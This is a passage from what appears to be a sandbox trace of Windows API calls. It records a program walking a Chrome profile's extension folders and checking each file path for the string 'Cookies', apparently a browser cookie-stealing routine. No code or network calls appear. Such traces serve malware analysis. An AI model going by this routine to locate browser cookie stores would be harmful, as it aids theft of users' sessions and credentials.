ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.291] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.291] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="fi", cAlternateFileName="")) returned 1 [0163.291] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0163.291] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0163.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.291] lstrlenW (lpString="\\") returned 1 [0163.291] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.291] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.292] lstrlenW (lpString="fi") returned 2 [0163.292] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" [0163.292] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" [0163.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*.*" [0163.292] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.292] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.292] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.292] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.292] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.292] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned 137 [0163.292] lstrlenW (lpString="\\") returned 1 [0163.292] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" [0163.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\" [0163.293] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\") returned 138 [0163.293] lstrlenW (lpString="messages.json") returned 13 [0163.293] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\" [0163.293] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" [0163.293] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json", lpSrch="Cookies") returned 0x0 [0163.293] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.293] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.293] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="fil", cAlternateFileName="")) returned 1 [0163.293] lstrcmpiW (lpString1="fil", lpString2=".") returned 1 [0163.293] lstrcmpiW (lpString1="fil", lpString2="..") returned 1 [0163.293] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.293] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.293] lstrlenW (lpString="\\") returned 1 [0163.293] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.293] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.293] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.293] lstrlenW (lpString="fil") returned 3 [0163.293] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.293] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" [0163.293] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" [0163.294] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*.*" [0163.294] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.294] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.294] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.294] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.294] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.294] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.294] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned 138 [0163.294] lstrlenW (lpString="\\") returned 1 [0163.294] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" [0163.294] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\" [0163.294] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\") returned 139 [0163.294] lstrlenW (lpString="messages.json") returned 13 [0163.294] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\" [0163.294] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json" [0163.294] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\messages.json", lpSrch="Cookies") returned 0x0 [0163.294] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f7970, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.294] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.295] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="fr", cAlternateFileName="")) returned 1 [0163.295] lstrcmpiW (lpString1="fr", lpString2=".") returned 1 [0163.295] lstrcmpiW (lpString1="fr", lpString2="..") returned 1 [0163.295] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.295] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.295] lstrlenW (lpString="\\") returned 1 [0163.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.295] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.295] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.295] lstrlenW (lpString="fr") returned 2 [0163.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.295] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="fr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fr" [0163.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 